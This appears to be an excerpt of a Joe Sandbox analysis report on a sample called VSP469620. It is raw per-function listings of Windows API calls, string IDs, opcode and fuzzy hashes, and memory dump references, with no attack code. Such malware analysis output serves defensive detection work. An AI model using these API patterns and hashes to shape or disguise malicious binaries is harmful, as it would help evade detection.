                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AE957B
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00AE95BE
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AE95D2
                                                              • VariantClear.OLEAUT32(?), ref: 00AE95E7
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00AE95F4
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE95FD
                                                              • VariantClear.OLEAUT32(?), ref: 00AE960F
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE961A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: a7ef9d6f1ae5289c2e683c1c41bf64bbecc4bd8a65bf8360a18f913fcea9ea56
                                                              • Instruction ID: 9d59081e32fe8bc9465ba438472df22cd7019aa72d8684d255de1918d7bc3cc1
                                                              • Opcode Fuzzy Hash: a7ef9d6f1ae5289c2e683c1c41bf64bbecc4bd8a65bf8360a18f913fcea9ea56
                                                              • Instruction Fuzzy Hash: DA413D71900219AFCB01EFA9E884DDEBB79FF08354F108069F516A7261DB71EA45CBA1
                                                              Function 00B0ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CoInitialize.OLE32 ref: 00B0ADF6
                                                              • CoUninitialize.OLE32 ref: 00B0AE01
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00B3D8FC,?), ref: 00B0AE61
                                                              • IIDFromString.OLE32(?,?), ref: 00B0AED4
                                                              • VariantInit.OLEAUT32(?), ref: 00B0AF6E
                                                              • VariantClear.OLEAUT32(?), ref: 00B0AFCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: c5eaf3d8e4b34b7336320bec7f458d08309fea564dc37c7703cf1a171953af56
                                                              • Instruction ID: 9c60733b666150773d480ba1a800572a94ec60b2071b60e905d34ff1cccd566b
                                                              • Opcode Fuzzy Hash: c5eaf3d8e4b34b7336320bec7f458d08309fea564dc37c7703cf1a171953af56
                                                              • Instruction Fuzzy Hash: BB617A71208312AFC710EF54D988B6EBBE8EF48714F204899F9859B2D1CB70ED44CB92
                                                              Function 00B08107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00B08168
                                                              • inet_addr.WSOCK32(?,?,?), ref: 00B081AD
                                                              • gethostbyname.WSOCK32(?), ref: 00B081B9
                                                              • IcmpCreateFile.IPHLPAPI ref: 00B081C7
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B08237
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B0824D
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B082C2
                                                              • WSACleanup.WSOCK32 ref: 00B082C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 60d4a200b6bef73ad13d7cea130e9eec739eb82074761cbbfb3c0147ac7991ca
                                                              • Instruction ID: a2b819c0d6fa44c192c36a50f0ff129f7c00014af705759734da6df58b0eb4b1
                                                              • Opcode Fuzzy Hash: 60d4a200b6bef73ad13d7cea130e9eec739eb82074761cbbfb3c0147ac7991ca
                                                              • Instruction Fuzzy Hash: E0517F316047009FD7209F64DD85B6ABBE5EF48720F148969FA95AB2E1DF70EA01CB41
                                                              Function 00B19E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B19E5B
                                                              • CreateMenu.USER32 ref: 00B19E76
                                                              • SetMenu.USER32(?,00000000), ref: 00B19E85
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B19F12
                                                              • IsMenu.USER32(?), ref: 00B19F28
                                                              • CreatePopupMenu.USER32 ref: 00B19F32
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B19F63
                                                              • DrawMenuBar.USER32 ref: 00B19F71
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                              • String ID: 0
                                                              • API String ID: 176399719-4108050209
                                                              • Opcode ID: a4fbe1494787d204d1c13c3a1b24dce25cc2f823728b7cb43107e32597052312
                                                              • Instruction ID: fa7f9f3584f7fa57cb4e694292096a56b2029b74f2c00519f3ac4ee287723d4d
                                                              • Opcode Fuzzy Hash: a4fbe1494787d204d1c13c3a1b24dce25cc2f823728b7cb43107e32597052312
                                                              • Instruction Fuzzy Hash: 65417879A00209AFDB10DF68E894BEABBF5FF48304F244069F946A7360DB30A954CF50
                                                              Function 00AFE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFE396
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AFE40C
                                                              • GetLastError.KERNEL32 ref: 00AFE416
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00AFE483
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: 96ab182982c5f3c9601b4d41f8e5a4854c63fa0bf93fe41af98927b37cad536b
                                                              • Instruction ID: 5868fb70739d5adaed9c80ba604ce4dcd0a8e8542f1deb8a7027ae7c72e77438
                                                              • Opcode Fuzzy Hash: 96ab182982c5f3c9601b4d41f8e5a4854c63fa0bf93fe41af98927b37cad536b
                                                              • Instruction Fuzzy Hash: C6319435A0020D9FDB11EFA4D945FBDB7F8EF44701F148069F605A72A2DB769901C791
                                                              Function 00AEB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AEB98C
                                                              • GetDlgCtrlID.USER32 ref: 00AEB997
                                                              • GetParent.USER32 ref: 00AEB9B3
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AEB9B6
                                                              • GetDlgCtrlID.USER32(?), ref: 00AEB9BF
                                                              • GetParent.USER32(?), ref: 00AEB9DB
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AEB9DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: 417e7dc988984aefce4e078873be361502885ca5719138d601b3e85ba1d640af
                                                              • Instruction ID: 4c40e621607e88bc71422d7184a8fc52beb11d73f190018136bb0e3b78b8ba91
                                                              • Opcode Fuzzy Hash: 417e7dc988984aefce4e078873be361502885ca5719138d601b3e85ba1d640af
                                                              • Instruction Fuzzy Hash: B821C574900104BFDB05ABA5DC86EFEBBB9EF4A310F100119F661972E2DB799815DB70
                                                              Function 00AEB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AEBA73
                                                              • GetDlgCtrlID.USER32 ref: 00AEBA7E
                                                              • GetParent.USER32 ref: 00AEBA9A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AEBA9D
                                                              • GetDlgCtrlID.USER32(?), ref: 00AEBAA6
                                                              • GetParent.USER32(?), ref: 00AEBAC2
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AEBAC5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: 5b747467a065650e8abd732d8a1ac966746df2155a19951eb8c01c8ce08baa8c
                                                              • Instruction ID: 6c11f9d57cea248056a6e10ad02613272daa53efe03695d3012de90787fcc75b
                                                              • Opcode Fuzzy Hash: 5b747467a065650e8abd732d8a1ac966746df2155a19951eb8c01c8ce08baa8c
                                                              • Instruction Fuzzy Hash: D621B374900144BFDF00ABA5DC86EFEB7B9EF45300F100015F561931A2DB7999159B30
                                                              Function 00AEBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32 ref: 00AEBAE3
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00AEBAF8
                                                              • _wcscmp.LIBCMT ref: 00AEBB0A
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AEBB85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: 6ef779769065aa3cb4f4681a988b04995eb9c2b6aaaf165f817b0935d4a95dc6
                                                              • Instruction ID: 4af08885dfc8d5ab50c16c9ec0cea68b8674fe3a59ed1e18da572f10dadaff7d
                                                              • Opcode Fuzzy Hash: 6ef779769065aa3cb4f4681a988b04995eb9c2b6aaaf165f817b0935d4a95dc6
                                                              • Instruction Fuzzy Hash: D3112976618743FEFA206731EC0BDA737ACDB15724F300022F955E50E9FFA5A9114524
                                                              Function 00B0B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00B0B2D5
                                                              • CoInitialize.OLE32(00000000), ref: 00B0B302
                                                              • CoUninitialize.OLE32 ref: 00B0B30C
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00B0B40C
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B0B539
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00B0B56D
                                                              • CoGetObject.OLE32(?,00000000,00B3D91C,?), ref: 00B0B590
                                                              • SetErrorMode.KERNEL32(00000000), ref: 00B0B5A3
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B0B623
                                                              • VariantClear.OLEAUT32(00B3D91C), ref: 00B0B633
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: 99610508097685222ea7f12f4e2188b8516becf9bc39b2608f3b74d101f2efd8
                                                              • Instruction ID: caaaef32a1f72c3db08f7841a223b1e41659a7f83ce79123b975bf4f455d2bd1
                                                              • Opcode Fuzzy Hash: 99610508097685222ea7f12f4e2188b8516becf9bc39b2608f3b74d101f2efd8
                                                              • Instruction Fuzzy Hash: 8BC10171608301AFC700DF64D894E6ABBE9FF88708F14499DF58A9B2A1DB71ED05CB52
                                                              Function 00AF67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 00AF67FD
                                                              • __swprintf.LIBCMT ref: 00AF680A
                                                                • Part of subcall function 00AD172B: __woutput_l.LIBCMT ref: 00AD1784
                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AF6834
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00AF6840
                                                              • LockResource.KERNEL32(00000000), ref: 00AF684D
                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 00AF686D
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00AF687F
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00AF688E
                                                              • LockResource.KERNEL32(?), ref: 00AF689A
                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AF68F9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                              • String ID:
                                                              • API String ID: 1433390588-0
                                                              • Opcode ID: dc26021bbe4df8c59bac7e06720687c9aeacde07a2e4cbd060007f59a3ef0847
                                                              • Instruction ID: d6ca7a8b5027927934781510206ef33a6f02329bacd977e681cbcfa61b2b65db
                                                              • Opcode Fuzzy Hash: dc26021bbe4df8c59bac7e06720687c9aeacde07a2e4cbd060007f59a3ef0847
                                                              • Instruction Fuzzy Hash: FC315E7190021AABDB119FA1ED55EBF7BA8FF08381F104429FA16E3150EB74D951DBB0
                                                              Function 00AF4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AF4047
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF405B
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00AF4062
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF4071
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AF4083
                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF409C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF40AE
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF40F3
                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF4108
                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00AF30A5,?,00000001), ref: 00AF4113
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: cc0335d7a80bf4d96b9da82aa31b6185881dfebc4cbc7c712e1e3dd06e71ae75
                                                              • Instruction ID: a0dbb3103bc993bae7c84825a4bf6306465b807e365d71237fee00ae399ece52
                                                              • Opcode Fuzzy Hash: cc0335d7a80bf4d96b9da82aa31b6185881dfebc4cbc7c712e1e3dd06e71ae75
                                                              • Instruction Fuzzy Hash: A431B171540209AFEB11DFA4EC46B7A77BDEB98711F208105FA08E72A0CFB599808B65
                                                              Function 00B2DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00ACB496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 00ACB4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 00ACB4B5
                                                              • GetStockObject.GDI32(00000005), ref: 00ACB4BD
                                                              • GetClientRect.USER32(?), ref: 00B2DD63
                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B2DD7A
                                                              • GetWindowDC.USER32(?), ref: 00B2DD86
                                                              • GetPixel.GDI32(00000000,?,?), ref: 00B2DD95
                                                              • ReleaseDC.USER32(?,00000000), ref: 00B2DDA7
                                                              • GetSysColor.USER32(00000005), ref: 00B2DDC5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                              • String ID:
                                                              • API String ID: 3430376129-0
                                                              • Opcode ID: af609e5be9393155d473fa367b2d54edd9794eafb6ca828a6bead58130731f2c
                                                              • Instruction ID: 62c10eb76f7cc4c9c425e15aaf67063ad9afc1a054d5fdede0794d9ba3da783a
                                                              • Opcode Fuzzy Hash: af609e5be9393155d473fa367b2d54edd9794eafb6ca828a6bead58130731f2c
                                                              • Instruction Fuzzy Hash: 76114C31500605EFDB216BB4FC0AFAD7BB1EB14325F218665FA6AA60E1CF324951DB20
                                                              Function 00AECB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumChildWindows.USER32(?,00AECF50), ref: 00AECE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: 9b80a51a5d4e936e608ea14bb79f6442597ac37cfb2f538081be0471f2cdfbb6
                                                              • Instruction ID: c68097e28016fc594dae5c5b776aa4e462bd51c84f223e681482a7b4b7e73853
                                                              • Opcode Fuzzy Hash: 9b80a51a5d4e936e608ea14bb79f6442597ac37cfb2f538081be0471f2cdfbb6
                                                              • Instruction Fuzzy Hash: 1A91E931600686ABCB18DF61C582BEEFBB5FF04310F548559D85AA7151DF30A95BCBD0
                                                              Function 00AB3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AB30DC
                                                              • CoUninitialize.OLE32(?,00000000), ref: 00AB3181
                                                              • UnregisterHotKey.USER32(?), ref: 00AB32A9
                                                              • DestroyWindow.USER32(?), ref: 00B25079
                                                              • FreeLibrary.KERNEL32(?), ref: 00B250F8
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B25125
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
